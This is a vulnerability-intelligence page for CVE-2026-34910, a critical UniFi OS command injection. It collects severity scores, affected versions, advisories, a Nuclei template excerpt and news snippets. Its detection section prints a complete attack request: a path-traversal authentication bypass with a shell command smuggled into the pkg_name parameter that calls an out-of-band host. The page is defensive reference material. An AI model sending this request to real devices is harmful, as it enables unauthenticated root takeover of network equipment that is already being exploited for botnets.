CVE-2026-34910
published 2026-05-22CVE-2026-34910: A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
PriorityP1100critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-06-26
Exploited in the wild
EPSS
78.55%
99.5th percentile
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
Affected
62 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ubiquiti_inc | efg | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | envr | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | envr-core | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | express_7 | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-fiber | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-industrial | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-max | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-ultra | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uck | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uck-enterprise | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uckp | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-beast | < 5.1.11 | 5.1.11 |
| ubiquiti_inc | udm-pro | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-pro-max | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-se | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr-5g | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr7 | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udw | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | unas-2 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-4 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro-4 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro-8 | < 5.1.10 | 5.1.10 |
Detection & IOCsextracted from sources · hover to see the quote
urlGET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+{{interactsh-url}}+%3b HTTP/1.1↗
yara↗
matchers: dsl: contains_any(body, "CODE_SYSTEM_ERROR", "System failure") AND contains(interactsh_protocol, "dns") AND status_code == 200
- →Look for path traversal sequences in requests targeting /api/auth/validate-sso/ — the authentication component evaluates the raw request URI while Nginx routes based on a normalized URI, enabling auth bypass to reach protected internal routes. ↗
- →Monitor requests to the package-update endpoint 'ucs/update/latest_package' for unsanitized user input in the pkg_name parameter, which is passed directly into a shell command. ↗
- →Because the attack requires no authentication, there will be no failed-login trail. Focus detection on process and network telemetry rather than auth logs. ↗
- →CVE-2026-34910 is chained with CVE-2026-34908 (auth bypass) and CVE-2026-34909 (path traversal) in a single-request RCE exploit delivering a root reverse shell; detections should consider the full chain. ↗
- ·The detection script does NOT detect active attacks, past exploitation, or the presence of persistence mechanisms/backdoors — only current vulnerability status. ↗
- ·Organizations applying the patch should first confirm the system has not already been compromised before trusting the patched state. ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Ubiquiti UniFi OS Server up to 5.0.7 input validation (WID-SEC-2026-1639)
vuldb·2026-06-23·CVSS 10.0
CVE-2026-34910 [CRITICAL] Ubiquiti UniFi OS Server up to 5.0.7 input validation (WID-SEC-2026-1639)
A vulnerability labeled as very critical has been found in Ubiquiti UniFi OS Server, UDM, UDM-Pro, UDM-SE, UDM-Pro-Max, UDM-Beast, EFG, UDW, UDR, UDR7, UDR-5G, Express 7, UNVR, UNVR-Pro, UNVR-Instant, UNVR-G2, UNVR-G2-Pro, ENVR, ENVR-Core, UNAS-2, UNAS-4, UNAS-Pro, UNAS-Pro-4, UNAS-Pro-8, UCKP, UCK, UCK-Enterprise, UCG-Ultra, UCG-Max, UCG-Fiber and UCG-Industrial up to 5.0.7. This issue affects some unknown processing. Executing a manipulation can lead to improper input validation.
This vulnerability is handled as CVE-2026-34910. The attack can be executed remotely. Additionally, an exploit exists.
The affected component should be upgraded.
GHSA
GHSA-fvgm-jgwh-qwx7: A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command I
ghsa_unreviewed·2026-05-22
CVE-2026-34910 [CRITICAL] CWE-20 GHSA-fvgm-jgwh-qwx7: A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command I
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
VulnCheck
Improper Input Validation
vulncheck·2026·CVSS 10.0
CVE-2026-34910 [CRITICAL] Improper Input Validation
Improper Input Validation
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.pwndefend.com/2026/06/09/cve-2026-34910-exploitation-itw-building-a-botnet-mirai/
VulnCheck
Improper Access Control
vulncheck·2026·CVSS 10.0
CVE-2026-34908 [CRITICAL] Improper Access Control
Improper Access Control
A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.pwndefend.com/2026/06/09/cve-2026-34910-exploitation-itw-building-a-botnet-mirai/
CISA
Ubiquiti UniFi OS Improper Input Validation Vulnerability
cisa·2026-06-23·CVSS 10.0
CVE-2026-34910 [CRITICAL] CWE-20 Ubiquiti UniFi OS Improper Input Validation Vulnerability
Vulnerability: Ubiquiti UniFi OS Improper Input Validation Vulnerability
Affected: Ubiquiti UniFi OS
Ubiquiti UniFi OS contains an improper input validation vulnerability which could allow a malicious actor with access to the network to conduct command injection.
Required Action: Apply mitigations in accordance with vendor instructions, ensuring compliance with CISA’s BOD 26-04 Prioritizing Security Updates Based on Risk (see URL in Notes) guidance and CISA’s “Forensics Triage Requirements” (see URL in Notes). Follow applicable BOD 26-04 guidance for cloud services or discontinue use of the product if mitigations are unavailable. Stakeholders are responsible for evaluating each asset's internet exposure and ensuring adherence to BOD 26-04 patching guidelines.
Notes: https://community.ui
No detection rules found.
Nuclei
UniFi OS Server - Command Injection
nuclei·CVSS 10.0
CVE-2026-34910 [CRITICAL] UniFi OS Server - Command Injection
UniFi OS Server - Command Injection
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
Template:
id: CVE-2026-34910
info:
name: UniFi OS Server - Command Injection
author: Kazgangap
severity: critical
description: |
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
impact: |
Network attackers can execute arbitrary commands, potentially leading to full system compromise.
remediation: |
Update to the latest version of UniFi OS.
reference:
- https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis
- https://nvd.nist.gov/vuln/de
Checkpoint
29th June – Threat Intelligence Report
blogs_checkpoint·2026-06-29
CVE-2026-20245 29th June – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 29th June – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 29th June, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Polymarket, a large cryptocurrency-based prediction market, has confirmed a supply chain attack after a third-party frontend vendor breach led to malicious JavaScript being injected into its website. Attackers tricked users into approving fraudulent transactions, stealing about $3 million from fewer than 15 accounts, while the b
Hackernews
CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
blogs_hackernews·2026-06-24·CVSS 9.8
CVE-2025-67038 [CRITICAL] CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday warned of active exploitation of a critical security flaw impacting Lantronix EDS5000 Series devices, urging Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by June 26, 2026.
The vulnerability in question is CVE-2025-67038 (CVSS score: 9.8), a code injection flaw that could result in the execution of arbitrary commands with elevated privileges.
"The HTTP RPC module executes a shell command to write logs when the user's authentication fails," according to the
Bleepingcomputer
CISA warns of max severity Ubiquiti flaws exploited in attacks
blogs_bleepingcomputer·2026-06-24·CVSS 9.8
CVE-2026-34908 [CRITICAL] CISA warns of max severity Ubiquiti flaws exploited in attacks
## CISA warns of max severity Ubiquiti flaws exploited in attacks
## Bill Toulas
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of hackers actively exploiting flaws in Ubiquity UniFi OS and Lantronix serial-to-ethernet servers.
According to the BOD 26-04 directive , federal agencies have three days to apply available security updates or vendor-recommended mitigations.
The Ubiquiti flaws that CISA added to its catalog of Known Exploited Vulnerabilities are:
CVE-2026-34908 : an access control bypass flaw that allows an unauthenticated attacker to make unauthorized changes to a UniFi OS system, potentially leading to full system compromise.
CVE-2026-34909 : a directory/path traversal vulnerability that allows an attacker to access sensitive files on the unde
Hackernews
⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
blogs_hackernews·2026-06-15·CVSS 8.8
CVE-2026-11645 [HIGH] ⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
Stuff broke again. Not in a movie way. An old tool was left exposed. An abandoned package was abused. A deprecated feature was still running in prod.
This week is the same lesson in a new form: phishing kits are easier to rent, AI names are useful bait, old login paths still fail, and forgotten software keeps becoming someone else's entry point.
Scroll through the full Monday Cybersecurity Recap below for the news, tools, webinars, and fixes worth your time this week.
## ⚡ Threat of the Week
Google Patches Actively Exploited Chrome 0-Day - G
Bleepingcomputer
Critical UniFi OS bug lets hackers gain root without authentication
blogs_bleepingcomputer·2026-06-08·CVSS 10.0
CVE-2026-34908 [CRITICAL] Critical UniFi OS bug lets hackers gain root without authentication
## Critical UniFi OS bug lets hackers gain root without authentication
## Bill Toulas
Attackers can chain three already fixed vulnerabilities in the Ubiquiti UniFi OS server to execute remote code with root privileges and without authentication.
The security issues are tracked as CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910. They have been addressed in May and impact UniFi OS Server versions 5.0.6 and earlier.
While all three flaws received the maximum severity rating despite their exploitation requiring access to the network, the vendor's advisory did not mention that they could be chained for remote code execution.
CVE-2026-34908 is an improper access control flaw that can allow unauthorized changes to vulnerable systems
CVE-2026-34909 is a path traversal vulnerability that c
Hackernews
⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
blogs_hackernews·2026-05-25
CVE-2026-46333 ⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
Monday recap. Same mess, new week.
A sketchy dev tool got people pwned, old bugs came back from the dead, and security products somehow needed protecting from themselves. A bunch of companies spent the week checking old boxes and forgotten servers they should've patched years ago. Good times.
Phishing crews are getting smarter too - less obvious scam junk, more targeted stuff that actually looks real. Meanwhile, botnets are grabbing anything exposed to the internet like it's free candy. The Internet's still a dumpster fire.
Let’s get into
Bleepingcomputer
Ubiquiti patches three max severity UniFi OS vulnerabilities
blogs_bleepingcomputer·2026-05-22·CVSS 10.0
CVE-2026-34908 [CRITICAL] Ubiquiti patches three max severity UniFi OS vulnerabilities
## Ubiquiti patches three max severity UniFi OS vulnerabilities
## Sergiu Gatlan
Ubiquiti has released security updates to patch three maximum severity vulnerabilities in UniFi OS that can be exploited by remote attackers without privileges.
UniFi OS is a unified operating system that powers UniFi Consoles and helps manage IT infrastructure, including networking, security, and other services, as well as UniFi applications such as UniFi Network, UniFi Protect, UniFi Access, UniFi Talk, and UniFi Connect.
The first flaw ( CVE-2026-34908 ) enables attackers to make unauthorized changes to targeted systems by exploiting an Improper Access Control weakness in UniFi OS, while the second ( CVE-2026-34909 ) allows them to access files on the underlying system by abusing a Path Traversal vulner
2026-05-22
Published
2026-06-23
Added to CISA KEV
Exploited in the wild